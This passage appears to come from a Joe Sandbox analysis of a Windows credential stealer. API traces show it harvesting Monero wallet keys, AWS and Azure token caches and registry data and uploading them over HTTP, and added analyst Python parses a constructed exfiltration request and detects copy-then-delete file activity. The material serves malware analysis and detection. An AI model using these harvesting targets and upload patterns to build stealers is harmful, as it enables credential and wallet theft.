                              • Instruction Fuzzy Hash: DE120271860128ABEB15EBA4DC96FDEB378FF54700F514199B50A62091DF702A4ACF72
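The call sequence above is a hand-built HTTP upload: InternetOpenA with access type 1 (INTERNET_OPEN_TYPE_DIRECT), InternetConnectA with service 3 (INTERNET_SERVICE_HTTP), HttpOpenRequestA with flags 0x00400100 (INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_PRAGMA_NOCACHE), HttpSendRequestA, then InternetReadFile in 0xC7-byte reads. The `"` and `------` entries in the string table are what a hand-assembled multipart/form-data body needs for its quoted field names and dash-prefixed boundary. The Python below is an added example for the analyst side, not code from the sample or from Joe Sandbox: it parses such a request as captured on the wire and expands the WinINet flag value into names. The request bytes, the field names and the URL path are constructed; the sample's real boundary, field names and C2 path are not shown in this listing.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed HTTP request (not captured from the analysed sample). Field names
# and path are illustrative; the uploaded file body reuses the record format
# seen in the FileZilla function above.
SAMPLE_REQUEST = (
    b"POST /upload HTTP/1.1\r\n"
    b"Host: 192.0.2.10\r\n"
    b"Content-Type: multipart/form-data; boundary=------ConstructedBoundary\r\n"
    b"Pragma: no-cache\r\n"
    b"Connection: Keep-Alive\r\n"
    b"\r\n"
    b"--------ConstructedBoundary\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n'
    b"\r\n"
    b"0123456789ABCDEF\r\n"
    b"--------ConstructedBoundary\r\n"
    b'Content-Disposition: form-data; name="file"; filename="passwords.txt"\r\n'
    b"Content-Type: application/octet-stream\r\n"
    b"\r\n"
    b"browser: FileZilla\nprofile: null\nurl: ftp.example.test:21\n"
    b"login: deploy\npassword: SuperSecret123\n\r\n"
    b"--------ConstructedBoundary--\r\n"
)

# dwFlags bits from wininet.h, enough to read the 0x00400100 in the listing.
_WININET_FLAGS = {
    0x80000000: "INTERNET_FLAG_RELOAD",
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE",
    0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT",
    0x00080000: "INTERNET_FLAG_NO_COOKIES",
    0x00000200: "INTERNET_FLAG_NO_UI",
    0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
}


def decode_wininet_flags(flags: int) -> List[str]:
    """Expand a HttpOpenRequest dwFlags value; unknown bits are kept as hex."""
    names = [name for bit, name in sorted(_WININET_FLAGS.items(), reverse=True) if flags & bit]
    known = 0
    for bit in _WININET_FLAGS:
        known |= bit
    if flags & ~known:
        names.append(f"0x{flags & ~known:08X}")
    return names


def parse_multipart_request(raw: bytes) -> Tuple[Dict[str, str], List[Dict[str, object]]]:
    """Split a raw HTTP request into (headers, parts). Each part is a dict with
    'name', 'filename' (None for plain fields) and the raw 'content' bytes."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no header/body separator")
    lines = head.split(b"\r\n")
    headers: Dict[str, str] = {"request-line": lines[0].decode("latin-1")}
    for line in lines[1:]:
        key, _, value = line.partition(b":")
        headers[key.strip().decode("latin-1").lower()] = value.strip().decode("latin-1")
    m = re.search(r'boundary="?([^";\s]+)"?', headers.get("content-type", ""))
    if not m:
        raise ValueError("not multipart/form-data or boundary missing")
    delimiter = b"--" + m.group(1).encode("latin-1")
    parts: List[Dict[str, object]] = []
    for chunk in body.split(delimiter)[1:]:      # bytes before the first delimiter are preamble
        if chunk.startswith(b"--"):             # closing delimiter: --boundary--
            break
        if chunk.startswith(b"\r\n"):
            chunk = chunk[2:]
        part_head, _, content = chunk.partition(b"\r\n\r\n")
        if content.endswith(b"\r\n"):            # the CRLF that precedes the next delimiter
            content = content[:-2]
        disposition = ""
        for line in part_head.split(b"\r\n"):
            if line.lower().startswith(b"content-disposition:"):
                disposition = line.decode("latin-1")
        name = re.search(r'(?<![\w-])name="([^"]*)"', disposition)
        fname = re.search(r'filename="([^"]*)"', disposition)
        parts.append({"name": name.group(1) if name else None,
                      "filename": fname.group(1) if fname else None,
                      "content": content})
    return headers, parts


if __name__ == "__main__":
    print(decode_wininet_flags(0x00400100))
    hdrs, found = parse_multipart_request(SAMPLE_REQUEST)
    for p in found:
        print(p["name"], p["filename"], len(p["content"]), "bytes")
```

When carving a real capture, match on the boundary taken from the Content-Type header rather than on a fixed run of dashes: the dash prefix is only the visible part of the boundary, and the body delimiter is always `--` plus the header value.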
                              APIs
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                                • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,008D8A30,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                                • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                                • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                                • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                                • Part of subcall function 00D48B60: GetSystemTime.KERNEL32(00D50E1A,008D9BB8,00D505AE,?,?,00D313F9,?,0000001A,00D50E1A,00000000,?,008D8A30,?,\Monero\wallet.keys,00D50E17), ref: 00D48B86
                                • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                                • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00D3CF83
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00D3D0C7
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00D3D0CE
                              • lstrcat.KERNEL32(?,00000000), ref: 00D3D208
                              • lstrcat.KERNEL32(?,00D51478), ref: 00D3D217
                              • lstrcat.KERNEL32(?,00000000), ref: 00D3D22A
                              • lstrcat.KERNEL32(?,00D5147C), ref: 00D3D239
                              • lstrcat.KERNEL32(?,00000000), ref: 00D3D24C
                              • lstrcat.KERNEL32(?,00D51480), ref: 00D3D25B
                              • lstrcat.KERNEL32(?,00000000), ref: 00D3D26E
                              • lstrcat.KERNEL32(?,00D51484), ref: 00D3D27D
                              • lstrcat.KERNEL32(?,00000000), ref: 00D3D290
                              • lstrcat.KERNEL32(?,00D51488), ref: 00D3D29F
                              • lstrcat.KERNEL32(?,00000000), ref: 00D3D2B2
                              • lstrcat.KERNEL32(?,00D5148C), ref: 00D3D2C1
                              • lstrcat.KERNEL32(?,00000000), ref: 00D3D2D4
                              • lstrcat.KERNEL32(?,00D51490), ref: 00D3D2E3
                                • Part of subcall function 00D4A820: lstrlen.KERNEL32(00D34F05,?,?,00D34F05,00D50DDE), ref: 00D4A82B
                                • Part of subcall function 00D4A820: lstrcpy.KERNEL32(00D50DDE,00000000), ref: 00D4A885
                              • lstrlen.KERNEL32(?), ref: 00D3D32A
                              • lstrlen.KERNEL32(?), ref: 00D3D339
                                • Part of subcall function 00D4AA70: StrCmpCA.SHLWAPI(008D8900,00D3A7A7,?,00D3A7A7,008D8900), ref: 00D4AA8F
                              • DeleteFileA.KERNEL32(00000000), ref: 00D3D3B4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                              • String ID:
                              • API String ID: 1956182324-0
                              • Opcode ID: 0150e83cf64670c7191262f36fba30278e2ee371c690ccbe2e0edbfd4214123d
                              • Instruction ID: 6d022574330873c1464fffed56a552f47b97796d58f802b96974b7fd8869b3ea
                              • Opcode Fuzzy Hash: 0150e83cf64670c7191262f36fba30278e2ee371c690ccbe2e0edbfd4214123d
                              • Instruction Fuzzy Hash: B9E15B72850108ABEB04EBA4DD96EEE7378FF58301F114158F506B6091EE35AE4ADB73
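The function above copies a file with CopyFileA, reads the copy into a heap buffer, assembles a record with a chain of lstrcat calls and removes the copy with DeleteFileA; a GetSystemTime subcall (00D48B60) sits on the path that names the copy. Copy-parse-delete is how stealers read database files that the owning application holds open with a sharing lock. The Python below is an added detection example, not code from the sample or from Joe Sandbox: it correlates Sysmon FileCreate (Event ID 11) and FileDelete (Event ID 23 or 26) events for the same process and path inside a short window. The events are constructed, and the assumption that the copy lands in a temp directory is the analyst's, since the report does not show the destination path.

```python
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Constructed Sysmon events (not from the report), using Sysmon's field names.
# EventID 11 = FileCreate, EventID 23 = FileDelete.
SAMPLE_EVENTS: List[Dict[str, object]] = [
    # Suspicious: same process creates a temp file and deletes it 2.33 s later.
    {"EventID": 11, "UtcTime": "2024-10-03 12:00:01.120",
     "ProcessGuid": "{11111111-0000-0000-0000-000000000001}",
     "Image": r"C:\Users\u\Desktop\file.exe",
     "TargetFilename": r"C:\Users\u\AppData\Local\Temp\1727956801.tmp"},
    {"EventID": 23, "UtcTime": "2024-10-03 12:00:03.450",
     "ProcessGuid": "{11111111-0000-0000-0000-000000000001}",
     "Image": r"C:\Users\u\Desktop\file.exe",
     "TargetFilename": r"C:\Users\u\AppData\Local\Temp\1727956801.tmp"},
    # Benign: installer temp file kept for half an hour (outside the window).
    {"EventID": 11, "UtcTime": "2024-10-03 12:05:00.000",
     "ProcessGuid": "{22222222-0000-0000-0000-000000000002}",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "TargetFilename": r"C:\Users\u\AppData\Local\Temp\MSI4F2A.tmp"},
    {"EventID": 23, "UtcTime": "2024-10-03 12:35:00.000",
     "ProcessGuid": "{22222222-0000-0000-0000-000000000002}",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "TargetFilename": r"C:\Users\u\AppData\Local\Temp\MSI4F2A.tmp"},
    # Benign: deleted quickly, but by a different process than the creator.
    {"EventID": 11, "UtcTime": "2024-10-03 12:10:00.000",
     "ProcessGuid": "{33333333-0000-0000-0000-000000000003}",
     "Image": r"C:\Program Files\App\app.exe",
     "TargetFilename": r"C:\Users\u\AppData\Local\Temp\cache.bin"},
    {"EventID": 23, "UtcTime": "2024-10-03 12:10:01.000",
     "ProcessGuid": "{44444444-0000-0000-0000-000000000004}",
     "Image": r"C:\Program Files\App\cleaner.exe",
     "TargetFilename": r"C:\Users\u\AppData\Local\Temp\cache.bin"},
]

# Directories in which a scratch copy is assumed to be written (lower-case).
TEMP_MARKERS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\")


def _ts(value: str) -> datetime:
    """Sysmon UtcTime is 'YYYY-MM-DD HH:MM:SS.mmm'."""
    return datetime.strptime(value, "%Y-%m-%d %H:%M:%S.%f")


def copy_then_delete_hits(events: List[Dict[str, object]],
                          window: timedelta = timedelta(seconds=30)) -> List[Dict[str, object]]:
    """Flag temp-directory files that one process creates and then deletes
    within `window`. Keyed on (ProcessGuid, path) so a cleanup by another
    process does not match, and paths outside temp directories are ignored."""
    pending: Dict[Tuple[object, str], datetime] = {}
    hits: List[Dict[str, object]] = []
    for ev in sorted(events, key=lambda e: _ts(str(e["UtcTime"]))):
        path = str(ev["TargetFilename"])
        if not any(marker in path.lower() for marker in TEMP_MARKERS):
            continue
        key = (ev["ProcessGuid"], path.lower())
        when = _ts(str(ev["UtcTime"]))
        if ev["EventID"] == 11:
            pending[key] = when
        elif ev["EventID"] in (23, 26):
            created = pending.pop(key, None)
            if created is not None and when - created <= window:
                hits.append({"image": ev["Image"], "path": path,
                             "seconds": (when - created).total_seconds()})
    return hits


if __name__ == "__main__":
    for hit in copy_then_delete_hits(SAMPLE_EVENTS):
        print(f"{hit['image']} created and deleted {hit['path']} within {hit['seconds']:.2f}s")
```

FileDelete logging (Sysmon Event ID 23 with archiving, or ID 26 without) has to be enabled in the Sysmon configuration for this correlation to have any delete events to work with; with ID 23 and archiving on, the deleted copy itself is preserved for the analyst.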
                              APIs
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                                • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                                • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                                • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                                • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,008D8A30,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                                • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                                • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,008DCF88,00000000,?,00D5144C,00000000,?,?), ref: 00D3CA6C
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00D3CA89
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00D3CA95
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00D3CAA8
                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00D3CAD9
                              • StrStrA.SHLWAPI(?,008DCEB0,00D50B52), ref: 00D3CAF7
                              • StrStrA.SHLWAPI(00000000,008DCF58), ref: 00D3CB1E
                              • StrStrA.SHLWAPI(?,008DD278,00000000,?,00D51458,00000000,?,00000000,00000000,?,008D88D0,00000000,?,00D51454,00000000,?), ref: 00D3CCA2
                              • StrStrA.SHLWAPI(00000000,008DD2F8), ref: 00D3CCB9
                                • Part of subcall function 00D3C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00D3C871
                                • Part of subcall function 00D3C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00D3C87C
                              • StrStrA.SHLWAPI(?,008DD2F8,00000000,?,00D5145C,00000000,?,00000000,008D88F0), ref: 00D3CD5A
                              • StrStrA.SHLWAPI(00000000,008D8A10), ref: 00D3CD71
                                • Part of subcall function 00D3C820: lstrcat.KERNEL32(?,00D50B46), ref: 00D3C943
                                • Part of subcall function 00D3C820: lstrcat.KERNEL32(?,00D50B47), ref: 00D3C957
                                • Part of subcall function 00D3C820: lstrcat.KERNEL32(?,00D50B4E), ref: 00D3C978
                              • lstrlen.KERNEL32(00000000), ref: 00D3CE44
                              • CloseHandle.KERNEL32(00000000), ref: 00D3CE9C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                              • String ID:
                              • API String ID: 3744635739-3916222277
                              • Opcode ID: c24ad09d093702ff3199f1290ca7be3c4b6804ee7d8cd6e952e2a58791c03315
                              • Instruction ID: 59f2f8522cbf92d598bff26010d3d4857565083e01882c158cce55ec7895e204
                              • Opcode Fuzzy Hash: c24ad09d093702ff3199f1290ca7be3c4b6804ee7d8cd6e952e2a58791c03315
                              • Instruction Fuzzy Hash: 30E1FB71950108ABEB15EBA8DC92FEEB778EF54300F414159F50676191EF306A8ACF72
                              APIs
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                              • RegOpenKeyExA.ADVAPI32(00000000,008DAD40,00000000,00020019,00000000,00D505B6), ref: 00D483A4
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00D48426
                              • wsprintfA.USER32 ref: 00D48459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00D4847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 00D4848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00D48499
                                • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpenlstrcpy$Enumwsprintf
                              • String ID: - $%s\%s$?
                              • API String ID: 3246050789-3278919252
                              • Opcode ID: 3622df9801609cbcb1c1256ab7457576f9fab7b42c8ad82fa9b8ab2390fa08dc
                              • Instruction ID: 624158d252c0dd665538311b2a6484ee3a063de433ea5c616cf7b73fe393cff7
                              • Opcode Fuzzy Hash: 3622df9801609cbcb1c1256ab7457576f9fab7b42c8ad82fa9b8ab2390fa08dc
                              • Instruction Fuzzy Hash: 5D81D97195011CABEB68DB54CC95FEEB7B8FF48700F008299E509A6180DF716A89DFB1
                              APIs
                                • Part of subcall function 00D48DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00D48E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00D44DB0
                              • lstrcat.KERNEL32(?,\.azure\), ref: 00D44DCD
                                • Part of subcall function 00D44910: wsprintfA.USER32 ref: 00D4492C
                                • Part of subcall function 00D44910: FindFirstFileA.KERNEL32(?,?), ref: 00D44943
                              • lstrcat.KERNEL32(?,00000000), ref: 00D44E3C
                              • lstrcat.KERNEL32(?,\.aws\), ref: 00D44E59
                                • Part of subcall function 00D44910: StrCmpCA.SHLWAPI(?,00D50FDC), ref: 00D44971
                                • Part of subcall function 00D44910: StrCmpCA.SHLWAPI(?,00D50FE0), ref: 00D44987
                                • Part of subcall function 00D44910: FindNextFileA.KERNEL32(000000FF,?), ref: 00D44B7D
                                • Part of subcall function 00D44910: FindClose.KERNEL32(000000FF), ref: 00D44B92
                              • lstrcat.KERNEL32(?,00000000), ref: 00D44EC8
                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00D44EE5
                                • Part of subcall function 00D44910: wsprintfA.USER32 ref: 00D449B0
                                • Part of subcall function 00D44910: StrCmpCA.SHLWAPI(?,00D508D2), ref: 00D449C5
                                • Part of subcall function 00D44910: wsprintfA.USER32 ref: 00D449E2
                                • Part of subcall function 00D44910: PathMatchSpecA.SHLWAPI(?,?), ref: 00D44A1E
                                • Part of subcall function 00D44910: lstrcat.KERNEL32(?,008DE520), ref: 00D44A4A
                                • Part of subcall function 00D44910: lstrcat.KERNEL32(?,00D50FF8), ref: 00D44A5C
                                • Part of subcall function 00D44910: lstrcat.KERNEL32(?,?), ref: 00D44A70
                                • Part of subcall function 00D44910: lstrcat.KERNEL32(?,00D50FFC), ref: 00D44A82
                                • Part of subcall function 00D44910: lstrcat.KERNEL32(?,?), ref: 00D44A96
                                • Part of subcall function 00D44910: CopyFileA.KERNEL32(?,?,00000001), ref: 00D44AAC
                                • Part of subcall function 00D44910: DeleteFileA.KERNEL32(?), ref: 00D44B31
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                              • API String ID: 949356159-974132213
                              • Opcode ID: b192725ca86ed822a3d45503fb24c8d1d9a1ebe8dd4342714e550cec4b1ac014
                              • Instruction ID: 2f76dd6762dfc22650fe39ab5d52e7e5db72742b1f89a6f90933ea79b3fa98d7
                              • Opcode Fuzzy Hash: b192725ca86ed822a3d45503fb24c8d1d9a1ebe8dd4342714e550cec4b1ac014
                              • Instruction Fuzzy Hash: F841837A9802086BDB50F770EC47FED3238EB64701F004454BA49660C1EEB45BCD9BB2
                              APIs
                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00D4906C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateGlobalStream
                              • String ID: image/jpeg
                              • API String ID: 2244384528-3785015651
                              • Opcode ID: 66aa825dcaeeef74d3dd7408409f40339c72198b63bc5629636ff4380fae1a8c
                              • Instruction ID: 467379f12379f439309b1d0b38984706b9e439c126810e1446879a4cf97d29ae
                              • Opcode Fuzzy Hash: 66aa825dcaeeef74d3dd7408409f40339c72198b63bc5629636ff4380fae1a8c
                              • Instruction Fuzzy Hash: 8371DB75910208ABDB04EFE4DC99FEEB7B8EB88700F148508F519A7290DB74A945DB72
                              APIs
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00D431C5
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00D4335D
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00D434EA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
